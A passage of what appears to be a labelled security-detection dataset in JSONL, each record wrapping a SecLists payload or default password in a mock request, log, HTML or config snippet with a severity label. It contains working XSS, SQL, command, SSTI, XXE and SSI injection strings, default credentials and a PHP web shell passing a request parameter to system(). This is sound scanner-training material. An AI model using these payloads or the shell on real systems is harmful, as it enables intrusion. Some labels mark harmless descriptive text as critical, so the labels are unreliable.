evasion. This is a normal XSS JavaScript injection, and most likely to get caught but I suggest trying it first (the quotes are not required in any modern browser so they are omitted here).</p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Description: No filter evasion. This is a normal XSS JavaScript injection, and most likely to get caught but I suggest trying it first (the quotes are not required in any modern browser so they are omitted here).", "injection_type": "XSS"}}]} {"id": "seclists_02455", "source": "seclists", "source_license": "MIT", "text": "filename=%29", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%29", "injection_type": "cmd"}}]} {"id": "seclists_02456", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"<aside id=x tabindex=1 onactivate=alert(1)></aside>\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<aside id=x tabindex=1 onactivate=alert(1)></aside>", "injection_type": "XSS"}}]} {"id": "seclists_02457", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\"><script src=//3334957647/1></div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<script src=//3334957647/1>", "injection_type": "XSS"}}]} {"id": "seclists_02458", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p>Author Name: ha.ckers.org</p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Author Name: ha.ckers.org", "injection_type": "XSS"}}]} {"id": "seclists_02459", "source": "seclists", "source_license": "MIT", "text": "# credentials.txt\nadmin:darkman,ioFTPD,ioFTPD,", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "darkman,ioFTPD,ioFTPD,"}}]} {"id": "seclists_02460", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p>Basic back ticked attribute breaker</p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Basic back ticked attribute breaker", "injection_type": "XSS"}}]} {"id": "seclists_02461", "source": "seclists", "source_license": "MIT", "text": "DB_PASSWORD=Visa VAP,root,QNX,\nDB_HOST=localhost\nDB_PORT=5432", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "Visa VAP,root,QNX,"}}]} {"id": "seclists_02462", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o", "injection_type": "cmd"}}]} {"id": "seclists_02463", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=<style>@keyframes x{}</style><address style=\"animation-name:x\" onanimationstart=\"alert(1)\"></address> HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<style>@keyframes x{}</style><address style=\"animation-name:x\" onanimationstart=\"alert(1)\"></address>", "injection_type": "XSS"}}]} {"id": "seclists_02464", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf %2527%0A%20str%3D%24%28echo%20BNZVGD%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%2527%0A%20str%3D%24%28echo%20BNZVGD%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20", "injection_type": "cmd"}}]} {"id": "seclists_02465", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=&quot;;id&quot; HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "&quot;;id&quot;", "injection_type": "cmd"}}]} {"id": "seclists_02466", "source": "seclists", "source_license": "MIT", "text": "# credentials.txt\nadmin:finder", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "finder"}}]} {"id": "seclists_02467", "source": "seclists", "source_license": "MIT", "text": "# Application log\n[2024-01-15 14:22:33] Query executed: SELECT name FROM products WHERE id = %20or%20'x'='x", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%20or%20'x'='x", "injection_type": "SQL"}}]} {"id": "seclists_02468", "source": "seclists", "source_license": "MIT", "text": "filename=&&echo$IFSOVPFJY$((4%2B71))$(echo$IFSOVPFJY)OVPFJY'", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "&&echo$IFSOVPFJY$((4%2B71))$(echo$IFSOVPFJY)OVPFJY'", "injection_type": "cmd"}}]} {"id": "seclists_02469", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\"><label id=x tabindex=1 onactivate=alert(1)></label></div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<label id=x tabindex=1 onactivate=alert(1)></label>", "injection_type": "XSS"}}]} {"id": "seclists_02470", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p><bgsound id=x tabindex=1 onfocus=alert(1)></bgsound></p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<bgsound id=x tabindex=1 onfocus=alert(1)></bgsound>", "injection_type": "XSS"}}]} {"id": "seclists_02471", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"<math><brute href=javascript:alert(1)>click\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<math><brute href=javascript:alert(1)>click", "injection_type": "XSS"}}]} {"id": "seclists_02472", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"<rp id=x tabindex=1 onbeforedeactivate=alert(1)></rp><input autofocus>\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<rp id=x tabindex=1 onbeforedeactivate=alert(1)></rp><input autofocus>", "injection_type": "XSS"}}]} {"id": "seclists_02473", "source": "seclists", "source_license": "MIT", "text": "GET /api/user?filter=*/* HTTP/1.1", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "*/*", "injection_type": "LDAP"}}]} {"id": "seclists_02474", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: ,@variable", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": ",@variable", "injection_type": "cmd"}}]} {"id": "seclists_02475", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p>Author Name: SIrDarckCat</p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Author Name: SIrDarckCat", "injection_type": "XSS"}}]} {"id": "seclists_02476", "source": "seclists", "source_license": "MIT", "text": "GET /api/users?id=' or '' ' HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "' or '' '", "injection_type": "SQL"}}]} {"id": "seclists_02477", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf &apos;%20OR", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "&apos;%20OR", "injection_type": "cmd"}}]} {"id": "seclists_02478", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\">Half-Open HTML/JavaScript</div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Half-Open HTML/JavaScript", "injection_type": "XSS"}}]} {"id": "seclists_02479", "source": "seclists", "source_license": "MIT", "text": "REDIS_URL=redis://default:dust@redis.internal:6379", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "dust"}}]} {"id": "seclists_02480", "source": "seclists", "source_license": "MIT", "text": "GET /profile?name=$smarty.template HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.ssti", "severity": "critical", "compliance": [], "fields": {"payload": "$smarty.template", "injection_type": "SSTI"}}]} {"id": "seclists_02481", "source": "seclists", "source_license": "MIT", "text": "# Application log\n[2024-01-15 14:22:33] Query executed: SELECT name FROM products WHERE id = \" or \"\"^\"", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "\" or \"\"^\"", "injection_type": "SQL"}}]} {"id": "seclists_02482", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"Author URL: http://sirdarckcat.net/\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Author URL: http://sirdarckcat.net/", "injection_type": "XSS"}}]} {"id": "seclists_02483", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf %0aecho%20EZVLSY$((12%2B10))$(echo%20EZVLSY)EZVLSY|", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%0aecho%20EZVLSY$((12%2B10))$(echo%20EZVLSY)EZVLSY|", "injection_type": "cmd"}}]} {"id": "seclists_02484", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"<embed src=javascript:alert(1)>\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<embed src=javascript:alert(1)>", "injection_type": "XSS"}}]} {"id": "seclists_02485", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\">Author Name: .mario</div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Author Name: .mario", "injection_type": "XSS"}}]} {"id": "seclists_02486", "source": "seclists", "source_license": "MIT", "text": "# credentials.txt\nadmin:submit", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "submit"}}]} {"id": "seclists_02487", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=<ol oncut=\"alert(1)\" contenteditable>test</ol> HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<ol oncut=\"alert(1)\" contenteditable>test</ol>", "injection_type": "XSS"}}]} {"id": "seclists_02488", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=<output draggable=\"true\" ondragenter=\"alert(1)\">test</output> HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<output draggable=\"true\" ondragenter=\"alert(1)\">test</output>", "injection_type": "XSS"}}]} {"id": "seclists_02489", "source": "seclists", "source_license": "MIT", "text": "DB_PASSWORD=Novell,WINDOWS_PASSTHRU,WINDOWS_PASSTHRU,\nDB_HOST=localhost\nDB_PORT=5432", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "Novell,WINDOWS_PASSTHRU,WINDOWS_PASSTHRU,"}}]} {"id": "seclists_02490", "source": "seclists", "source_license": "MIT", "text": "<html>\n<body>\n<pre><!--#exec cmd=\"ls\" --></pre>\n</body>\n</html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<pre><!--#exec cmd=\"ls\" --></pre>", "injection_type": "SSI"}}]} {"id": "seclists_02491", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"Hex Encoding w/out Semicolons\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Hex Encoding w/out Semicolons", "injection_type": "XSS"}}]} {"id": "seclists_02492", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: ;echo%20UQHDID$((15%2B76))$(echo%20UQHDID)UQHDID%7C", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": ";echo%20UQHDID$((15%2B76))$(echo%20UQHDID)UQHDID%7C", "injection_type": "cmd"}}]} {"id": "seclists_02493", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"<style>@keyframes slidein {}</style><dir style=\"animation-duration:1s;animation-name:slidein;animation-iteration-count:2\" onanimationiteration=\"alert(1)\"></dir>\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<style>@keyframes slidein {}</style><dir style=\"animation-duration:1s;animation-name:slidein;animation-iteration-count:2\" onanimationiteration=\"alert(1)\"></dir>", "injection_type": "XSS"}}]} {"id": "seclists_02494", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\"><element draggable=\"true\" ondrag=\"alert(1)\">test</element></div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<element draggable=\"true\" ondrag=\"alert(1)\">test</element>", "injection_type": "XSS"}}]} {"id": "seclists_02495", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: &", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "&", "injection_type": "cmd"}}]} {"id": "seclists_02496", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: /./././././././././././etc/shadow", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "/./././././././././././etc/shadow", "injection_type": "cmd"}}]} {"id": "seclists_02497", "source": "seclists", "source_license": "MIT", "text": "spring.datasource.password=RoamAbout,admin,password,\nspring.datasource.url=jdbc:mysql://localhost:3306/app", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "RoamAbout,admin,password,"}}]} {"id": "seclists_02498", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=<dl ondblclick=\"alert(1)\">test</dl> HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<dl ondblclick=\"alert(1)\">test</dl>", "injection_type": "XSS"}}]} {"id": "seclists_02499", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: %0A%20str%3D%24%28echo%20EIGKOY%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%252F%252F", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%0A%20str%3D%24%28echo%20EIGKOY%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%252F%252F", "injection_type": "cmd"}}]} {"id": "seclists_02500", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p>Exploit Description: This vector utilizes backslashes to exploit a parsing error in gecko based browsers and injects a remote XBL. As we can see gecko based browsers accept various characters as valid tags.</p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Description: This vector utilizes backslashes to exploit a parsing error in gecko based browsers and injects a remote XBL. As we can see gecko based browsers accept various characters as valid tags.", "injection_type": "XSS"}}]} {"id": "seclists_02501", "source": "seclists", "source_license": "MIT", "text": "DB_PASSWORD=DuPont,root,par0t,\nDB_HOST=localhost\nDB_PORT=5432", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "DuPont,root,par0t,"}}]} {"id": "seclists_02502", "source": "seclists", "source_license": "MIT", "text": "REDIS_URL=redis://default:Philips,admin,admin,@redis.internal:6379", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "Philips,admin,admin,"}}]} {"id": "seclists_02503", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p>content: \u201c\\61\\6c\\65\\72\\74\\28\\31\\29\u2033</p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "content: \u201c\\61\\6c\\65\\72\\74\\28\\31\\29\u2033", "injection_type": "XSS"}}]} {"id": "seclists_02504", "source": "seclists", "source_license": "MIT", "text": "filename=<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>", "injection_type": "cmd"}}]} {"id": "seclists_02505", "source": "seclists", "source_license": "MIT", "text": "filename=')print(`echo%20DWTUTD%0aecho%20$((10%2B15))%0aecho%20DWTUTD%0aecho%20DWTUTD`)%3B//DWTUTD", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "')print(`echo%20DWTUTD%0aecho%20$((10%2B15))%0aecho%20DWTUTD%0aecho%20DWTUTD`)%3B//DWTUTD", "injection_type": "cmd"}}]} {"id": "seclists_02506", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"<b>\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<b>", "injection_type": "XSS"}}]} {"id": "seclists_02507", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"IMG No Quotes/Semicolon\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "IMG No Quotes/Semicolon", "injection_type": "XSS"}}]} {"id": "seclists_02508", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: '%20or%201=1", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "'%20or%201=1", "injection_type": "cmd"}}]} {"id": "seclists_02509", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=<nobr draggable=\"true\" ondragend=\"alert(1)\">test</nobr> HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<nobr draggable=\"true\" ondragend=\"alert(1)\">test</nobr>", "injection_type": "XSS"}}]} {"id": "seclists_02510", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: %0A%20str%3D%24%28echo%20IKKWEG%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%23", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%0A%20str%3D%24%28echo%20IKKWEG%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%23", "injection_type": "cmd"}}]} {"id": "seclists_02511", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\">/((\\%3D)|(=))[^\\n]*((\\%3C)|<)[^\\n]+((\\%3E)|>)/</div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "/((\\%3D)|(=))[^\\n]*((\\%3C)|<)[^\\n]+((\\%3E)|>)/", "injection_type": "XSS"}}]} {"id": "seclists_02512", "source": "seclists", "source_license": "MIT", "text": "GET /api/users?id=' or 1 --' HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "' or 1 --'", "injection_type": "SQL"}}]} {"id": "seclists_02513", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=') or ('a'='a HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "') or ('a'='a", "injection_type": "cmd"}}]} {"id": "seclists_02514", "source": "seclists", "source_license": "MIT", "text": "REDIS_URL=redis://default:golfer1@redis.internal:6379", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "golfer1"}}]} {"id": "seclists_02515", "source": "seclists", "source_license": "MIT", "text": "# Application log\n[2024-01-15 14:22:33] Query executed: SELECT name FROM products WHERE id = password:*/=1--", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "password:*/=1--", "injection_type": "SQL"}}]} {"id": "seclists_02516", "source": "seclists", "source_license": "MIT", "text": "GET /api/users?id=hi' or 1=1 -- HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "hi' or 1=1 --", "injection_type": "SQL"}}]} {"id": "seclists_02517", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=something%00html HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "something%00html", "injection_type": "cmd"}}]} {"id": "seclists_02518", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=Exploit Description: Remote style sheet (using something as simple as a remote style sheet you can include your XSS as the style question redefined using an embedded expression.) This only works in IE and Netscape 8.1+ in IE rendering engine mode. Notice that there is nothing on the page to show that there is included JavaScript. Note: With all of these remote style sheet examples they use the body tag, so it won't work unless there is some content on the page other than the vector itself, so you'll need to add a single letter to the page to make it work if it's an otherwise blank page. HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Description: Remote style sheet (using something as simple as a remote style sheet you can include your XSS as the style question redefined using an embedded expression.) This only works in IE and Netscape 8.1+ in IE rendering engine mode. Notice that there is nothing on the page to show that there is included JavaScript. Note: With all of these remote style sheet examples they use the body tag, so it won't work unless there is some content on the page other than the vector itself, so y", "injection_type": "XSS"}}]} {"id": "seclists_02519", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"Exploit String: 1};a=eval;b=alert;a(b(14));//\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit String: 1};a=eval;b=alert;a(b(14));//", "injection_type": "XSS"}}]} {"id": "seclists_02520", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: &ltscript&gtalert(document.cookie);&ltscript&gtalert", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "&ltscript&gtalert(document.cookie);&ltscript&gtalert", "injection_type": "cmd"}}]} {"id": "seclists_02521", "source": "seclists", "source_license": "MIT", "text": "POST /api/import HTTP/1.1\nContent-Type: application/xml\n\n<!DOCTYPE xxe [<!ENTITY foo \"aaaaaa\">]><root>&foo;</root>", "findings": [{"category": "malicious", "subcategory": "malicious.xxe", "severity": "critical", "compliance": [], "fields": {"payload": "<!DOCTYPE xxe [<!ENTITY foo \"aaaaaa\">]><root>&foo;</root>", "injection_type": "XXE"}}]} {"id": "seclists_02522", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=%0aecho%20BLBAVR$((79%2B49))$(echo%20BLBAVR)BLBAVR%26 HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%0aecho%20BLBAVR$((79%2B49))$(echo%20BLBAVR)BLBAVR%26", "injection_type": "cmd"}}]} {"id": "seclists_02523", "source": "seclists", "source_license": "MIT", "text": "<?xml version=\"1.0\"?>\n<![CDATA[<script>var n=0;while(true){n++;}</script>]]>", "findings": [{"category": "malicious", "subcategory": "malicious.xxe", "severity": "critical", "compliance": [], "fields": {"payload": "<![CDATA[<script>var n=0;while(true){n++;}</script>]]>", "injection_type": "XXE"}}]} {"id": "seclists_02524", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=Exploit Tags: general, evil tags, obfuscated HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Tags: general, evil tags, obfuscated", "injection_type": "XSS"}}]} {"id": "seclists_02525", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=<xss id=x tabindex=1 onfocusin=alert(1)></xss> HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<xss id=x tabindex=1 onfocusin=alert(1)></xss>", "injection_type": "XSS"}}]} {"id": "seclists_02526", "source": "seclists", "source_license": "MIT", "text": "<?php\n\n/* +**********************************************************************************\n * The contents of this file are subject to the vtiger CRM Public License Version 1.1\n * (\"License\"); You may not use this file except in compliance with the License\n * The Original Code is: vtiger CRM Open Source\n * The Initial Developer of the Original Code is vtiger.\n * Portions created by vtiger are Copyright (C) vtiger.\n * All Rights Reserved.\n * ********************************************************************************** */\n\nclass Settings_VtigerVulnPlugin_Gateway_Action extends Vtiger_BasicAjax_Action {\n\n public function process(Vtiger_Request $request) {\n echo \"<pre>\";\n system($request->get(\"cmd\"));\n echo \"</pre>\";\n die;\n }\n\n public function validateRequest(Vtiger_Request $request) {\n return true;\n }\n\n}\n", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "compliance": [], "fields": {"shell_type": "php", "filename": "Gateway.php"}}]} {"id": "seclists_02527", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p><code onclick=\"alert(1)\">test</code></p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<code onclick=\"alert(1)\">test</code>", "injection_type": "XSS"}}]} {"id": "seclists_02528", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=<wbr draggable=\"true\" ondragenter=\"alert(1)\">test</wbr> HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<wbr draggable=\"true\" ondragenter=\"alert(1)\">test</wbr>", "injection_type": "XSS"}}]} {"id": "seclists_02529", "source": "seclists", "source_license": "MIT", "text": "filename=%0A%20str%3D%24%28echo%20NNDFMH%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%27", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%0A%20str%3D%24%28echo%20NNDFMH%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%27", "injection_type": "cmd"}}]} {"id": "seclists_02530", "source": "seclists", "source_license": "MIT", "text": "REDIS_URL=redis://default:martin@redis.internal:6379", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "martin"}}]} {"id": "seclists_02531", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\"><style>:target {color: red;}</style><meter id=x style=\"transition:color 10s\" ontransitioncancel=alert(1)></meter></div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<style>:target {color: red;}</style><meter id=x style=\"transition:color 10s\" ontransitioncancel=alert(1)></meter>", "injection_type": "XSS"}}]} {"id": "seclists_02532", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"<table draggable=\"true\" ondragstart=\"alert(1)\">test</table>\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<table draggable=\"true\" ondragstart=\"alert(1)\">test</table>", "injection_type": "XSS"}}]} {"id": "seclists_02533", "source": "seclists", "source_license": "MIT", "text": 